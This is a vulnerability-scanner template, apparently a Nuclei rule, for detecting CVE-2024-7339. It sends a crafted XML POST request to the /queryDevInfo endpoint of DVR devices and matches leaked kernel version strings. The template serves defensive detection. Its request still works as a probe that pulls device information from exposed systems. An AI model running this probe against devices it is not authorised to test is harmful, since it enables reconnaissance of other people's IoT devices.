CVE-2024-7339

Detects cve-2024-7339 in DVR Devices

id: CVE-2024-7339

info:
  name: CVE-2024-7339 Information Leak vulnerability in various DRV Devices
  author: Redflare-cyber
  severity: medium
  description: |
    This template detects an information disclosure vulnerability in the `/queryDevInfo` endpoint of DVR systems.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7339
    - https://github.com/RevoltSecurities/CVE-2024-7339
  classification:
    cve-id: CVE-2024-7339
  tags: cve,cve-2024,information-disclosure,DVR,IoT

requests:
  - method: POST
    path:
      - "{{BaseURL}}/queryDevInfo"
    body: |
      <?xml version="1.0" encoding="utf-8" ?>
      <request version="1.0" systemType="NVMS-9000" clientType="WEB"/>

    headers:
      Content-Type: application/xml
      Content-Length: "103"

    matchers:
      - type: regex
        part: body
        regex:
          - "<kenerlVersion>(I686-I617-I4K9|I6P5-I6Q7-I4K9|I6P5-I6Q7-IBKA|I6P5-I6Q7-ICJ4|I6P5-I6Q7-J878|I6P5-J4M8-J7N7|I6P5-J4M8-JAL9|I6P5-J4M8-JCN8|I74B-I74C-I4K9|I74C-I74C-I4K9|I773-I7V2-J1GA|I832-I828-I4K9|I832-I828-IBKA|I832-I828-ICJ3|I8K8-I9R8-IC7K|I8K8-I9R8-ICJ3|I8K8-I9R8-J2I3|I8N8-I9R8-IC7L|I8N8-I9R8-ICJ3|I8N8-I9R8-J2MA|I9BB-I9KB-J8F5|I9C2-I9B9-IBKA|I9C2-I9B9-ICJ3|I9C2-I9B9-ICJ4|I9C2-I9B9-J6Q2|I9C2-I9B9-J6R3|I9C2-I9B9-J9GA|I9C2-J3I7-J7N7|I9C2-J3I7-J9Q2|I9C2-J3I7-JCN8|J4M6-J4F5-J7N7|J4M6-J4F5-JAL8|J4M6-J4F5-JCN8|K5PB-K5PC-L7R3|K5Q5-K5PC-LBK7|L338-L33B-L7C1|LCI9-LCI9-LCI9|MC28-MC28-MC28)</kenerlVersion>"

      - type: word
        part: body
        words:
          - "</kenerlVersion>"
PreviousSiemens Simatic PLCNextFrontpage-exposures

Last updated